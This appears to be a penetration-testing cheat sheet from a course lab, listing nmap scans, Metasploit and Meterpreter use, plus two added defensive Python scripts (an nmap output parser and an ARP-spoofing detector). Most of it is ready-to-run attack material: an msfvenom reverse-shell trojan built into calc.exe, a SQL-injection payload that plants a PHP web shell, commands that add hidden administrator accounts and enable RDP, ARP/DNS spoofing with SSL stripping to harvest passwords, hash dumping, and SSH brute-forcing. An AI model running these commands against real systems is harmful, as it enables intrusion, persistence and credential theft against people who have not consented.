NMAP

NMAP Host Discovery

ARP based (what -sn does for targets on the local Ethernet segment)
nmap -sn

ICMP based (for targets off the local segment; as root, -sn sends an ICMP echo, a TCP SYN to 443, a TCP ACK to 80 and an ICMP timestamp request)
nmap -sn

TCP SYN Ping
nmap -PS          (optionally -PS<port list>; default port 80)

UDP Ping
nmap -PU

Others
https://nmap.org/book/man-host-discovery.html
NMAP Port Scanning

SYN Scan (half-connect: the 3-way handshake is never completed)
requires root rights
nmap -sS

Connect Scan (complete 3-way handshake)
no root rights needed
nmap -sT

ACK Scan
nmap -sA

UDP Scan
if an ICMP unreachable reply comes back - port closed
else (no reply) not sure! nmap reports it as open|filtered
nmap -sU

Others
https://nmap.org/book/man-port-scanning-techniques.html

NMAP options

Specify target
192.168.1-254.1-254
IP/16
nmap -iL iplist.txt

Specify ports
-p21,22
-p1-65535

Output redirection
nmap -oN output.txt 192.168.1.1          (-oN normal, -oX XML, -oG grepable, -oA all three)
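Added example, not part of the original cheat sheet: a small parser for the normal (-oN) output written by the command above, plus a check that flags open ports missing from a per-host baseline. The scan text is a constructed sample and the baseline dict is an assumed input.

```python
import re
from collections import defaultdict

# Constructed sample of nmap "normal" (-oN) output, not a real scan result.
SAMPLE_ON = """\
Nmap scan report for 192.168.1.1
Host is up (0.0010s latency).
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
3389/tcp filtered ms-wbt-server

Nmap scan report for web01.example.test (192.168.1.2)
PORT    STATE SERVICE
21/tcp  open  ftp
443/tcp open  https
"""

HOST_RE = re.compile(r"^Nmap scan report for (?P<name>\S+)(?: \((?P<ip>[\d.]+)\))?")
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<svc>\S+)")


def parse_normal_output(text):
    """Return {host: [(port, proto, state, service), ...]} parsed from -oN text."""
    hosts = defaultdict(list)
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group("ip") or m.group("name")  # prefer the IP in parentheses
            hosts[current]  # register the host even if no port lines follow
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            hosts[current].append((int(m.group("port")), m.group("proto"),
                                   m.group("state"), m.group("svc")))
    return dict(hosts)


def unexpected_open_ports(hosts, allowed):
    """List open ports missing from the per-host allowlist {host: {(port, proto)}}."""
    findings = []
    for host, ports in hosts.items():
        for port, proto, state, svc in ports:
            if state == "open" and (port, proto) not in allowed.get(host, set()):
                findings.append((host, port, proto, svc))
    return findings


if __name__ == "__main__":
    baseline = {"192.168.1.1": {(22, "tcp")}, "192.168.1.2": {(443, "tcp")}}
    print(unexpected_open_ports(parse_normal_output(SAMPLE_ON), baseline))
```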
Scanning speed
-T<0-5>          (default is -T3)

No DNS resolution
-n

Service version detection
-sV

OS detection
-O

Scripts
ls /usr/share/nmap/scripts
nmap --script <script>
nmap --script discovery <IP>
nmap --script http* <IP>

Enumeration - smtp-user-enum
https://github.com/pentestmonkey/smtp-user-enum/blob/master/smtp-user-enum-user-docs.pdf
smtp-user-enum -M [method: VRFY, EXPN or RCPT] -U [UserList] -t [target]

Vulnerability Scan

Nessus
Download: http://www.tenable.com/products/nessus/select-your-operating-system#tos
Verify it is listening: netstat -tlnp | grep 8834
service nessusd restart
To disable categories: in the Policy, Plugins tab, disable Brute Force and Denial of Service

NIKTO - web scanning
nikto -Help
nikto -host 172.16.150.130 -port 80 -output 'test.nikto' -Format txt

ZAP Proxy
can be used as an intercepting proxy in the browser (listens on port 8080)

Exploits

Metasploit
msfconsole
> search <vulnerability code>            ex: ms08-067
> use <path returned by search>
> info                                   lists what is already configured, ex: RHOST
> show options
> show payloads                          lists the payloads compatible with the exploit
> set RHOST <IP target>
> set LHOST <local IP>
> set PAYLOAD <chosen payload>           ex: windows/shell/reverse_tcp
> exploit

Meterpreter
> set PAYLOAD <meterpreter payload> ex: windows/meterpreter/reverse_tcp
> exploit
> download C:\\WINDOWS\\system32\\calc.exe /root/
> keyscan start
> keyscan dump

https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

Add Trojan
ex:
msfvenom -p windows/shell/reverse_tcp LHOST=172.16.150.129 -a x86 --platform Windows -e x86/shikata_ga_nai -i 3 -x /root/calc.exe -o calc_backdoor.exe

set Metasploit to listen for the incoming connection:
> use exploit/multi/handler
> set PAYLOAD windows/shell/reverse_tcp
> set LHOST 172.16.150.129
> exploit

Microsoft Commands
net user <user> <password> /add
net localgroup Administrators <user> /add          adds the user to the Administrators group
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f          enables Remote Desktop

Upload file to Microsoft Windows

Using SMB share
smbclient //172.16.150.130/shared
> put calc_backdoor.exe

Using meterpreter
meterpreter> upload calc_backdoor.exe C://WINDOWS//system32

Web Vulnerabilities

SQL Injection
Discover the vulnerabilities with ZAP Proxy
http://pentestmonkey.net/category/cheat-sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
http://www.101hacker.com/2010/12/sql-injection-tutorial.html

Add script through SQL Injection
player=ZAP' UNION SELECT "<?php echo passthru($_GET['cmd']); ?>",2,3,4 into outfile "c:\\xampp\\htdocs\\c.php" -- `

http://172.16.150.130/c.php?cmd=hostname
http://172.16.150.130/c.php?cmd=net user <user> <password> /add
http://172.16.150.130/c.php?cmd=net localgroup Administrators <user> /add          adds the user to the Administrators group
http://172.16.150.130/c.php?cmd=reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Network Attacks

ARP spoofing

MitM
IP Forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 172.16.150.130 172.16.150.2          (target IP, then gateway IP)

Wireshark - filter HTTP
Wireshark, select one packet from the target -> Right Click -> Follow TCP Stream
Get the session cookie and add it to your browser
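Added defensive example, not part of the original sheet: spotting the effect of the arpspoof command above from the victim side by parsing `arp -an` output and flagging a MAC address shared by several IPs or a gateway MAC that no longer matches a known-good baseline. Both ARP snapshots below are constructed samples, and the baseline dict is an assumed input.

```python
import re
from collections import defaultdict

# Matches one Linux "arp -an" line, e.g. "? (172.16.150.2) at 00:50:56:ea:01:02 [ether] on eth0".
ARP_RE = re.compile(r"\((?P<ip>[\d.]+)\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.I)

# Constructed snapshots (not real captures): a clean table, then one taken while
# the gateway entry has been overwritten with another host's MAC address.
ARP_CLEAN = """\
? (172.16.150.2) at 00:50:56:ea:01:02 [ether] on eth0
? (172.16.150.129) at 08:00:27:aa:bb:cc [ether] on eth0
? (172.16.150.50) at <incomplete> on eth0
"""
ARP_POISONED = """\
? (172.16.150.2) at 08:00:27:aa:bb:cc [ether] on eth0
? (172.16.150.129) at 08:00:27:aa:bb:cc [ether] on eth0
"""


def parse_arp_table(text):
    """Return {ip: mac} from 'arp -an' output; <incomplete> entries are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_RE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def arp_anomalies(table, baseline):
    """Return (ip, reason) pairs for MACs shared by several IPs or differing from baseline."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:  # one NIC answering for several IPs is the classic spoofing sign
            for ip in ips:
                findings.append((ip, "mac %s shared by %s" % (mac, ", ".join(sorted(ips)))))
    for ip, expected in baseline.items():  # baseline: known-good {ip: mac}, e.g. the gateway
        seen = table.get(ip)
        if seen is not None and seen != expected.lower():
            findings.append((ip, "mac changed from %s to %s" % (expected, seen)))
    return findings


if __name__ == "__main__":
    gateway_baseline = {"172.16.150.2": "00:50:56:ea:01:02"}
    print(arp_anomalies(parse_arp_table(ARP_POISONED), gateway_baseline))
```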

HTTPS method 1 - DNS spoofing
IP Forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 172.16.150.130 172.16.150.2          (target IP, then gateway IP)
echo "172.16.150.129 cs.curs.pub.ro" > myhosts.txt          (attacker IP)
dnsspoof -i eth0 -f myhosts.txt

root@kali:~# webmitm -ddd cs.curs.pub.ro
(on first run webmitm generates a self-signed certificate and prompts for its fields; the victim's browser will warn that the certificate is untrusted)
Country Name (2 letter code) [AU]:RO
State or Province Name (full name) [Some-State]:Romania
Locality Name (eg, city) []:Bucharest
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Universitatea POLITEHNICA din Bucuresti
Organizational Unit Name (eg, section) []:NCIT Cluster
Common Name (e.g. server FQDN or YOUR name) []:acs.curs.pub.ro
Email Address []:me@example.com

close webmitm, then run it again with its output logged:

webmitm -ddd cs.curs.pub.ro &> webmitm.cs.curs.pub.ro.log

cat webmitm.cs.curs.pub.ro.log
cat webmitm.cs.curs.pub.ro.log | grep -i username=

HTTPS method 2 - SSL Stripping
(does not work against sites the browser already knows through HSTS or the HSTS preload list)
IP Forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 172.16.150.130 172.16.150.2          (target IP, then gateway IP)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234
sslstrip -l 1234 -s -w traffic.log

cat traffic.log | grep -i \&password=

Password Attack
https://github.com/danielmiessler/SecLists/tree/master/Passwords
https://github.com/danielmiessler/SecLists/blob/master/Passwords/500-worst-passwords.txt

Medusa (remote)
medusa -h 172.16.150.132 -u dexter -P 500-worst-passwords.txt -M ssh
http://foofus.net/goons/jmk/medusa/medusa.html

John the Ripper

Complex passwords generator
john --rules --wordlist=500-worst-passwords.txt --stdout > newdictionary.txt          (applies John's mangling rules to expand the wordlist)

Unshadowing (local)
unshadow passwd shadow > unshadow.txt
john unshadow.txt

Crack LM/NTLM hashes (local)
meterpreter> run post/windows/gather/hashdump
- copy the hashes into a text file (windump.txt)

Crack LM
john --format=LM windump.txt
john --show windump.txt
Crack NTLM
john --show windump.txt | cut -d: -f2 > pwd_LM.txt          (cracked LM passwords are all uppercase; reuse them as a wordlist)
john --wordlist=pwd_LM.txt --rules=NT --format=NT hashes.txt          (the NT rules try case variants against the NTLM hashes)
john --show --rules=NT --format=NT windump.txt

Hydra (remote)
hydra -l dexter -P newdictionary.txt ssh://172.16.150.132

Online rainbowtables
http://rainbowtables.it64.com/
https://crackstation.net/
https://www.objectif-securite.ch/en/ophcrack.php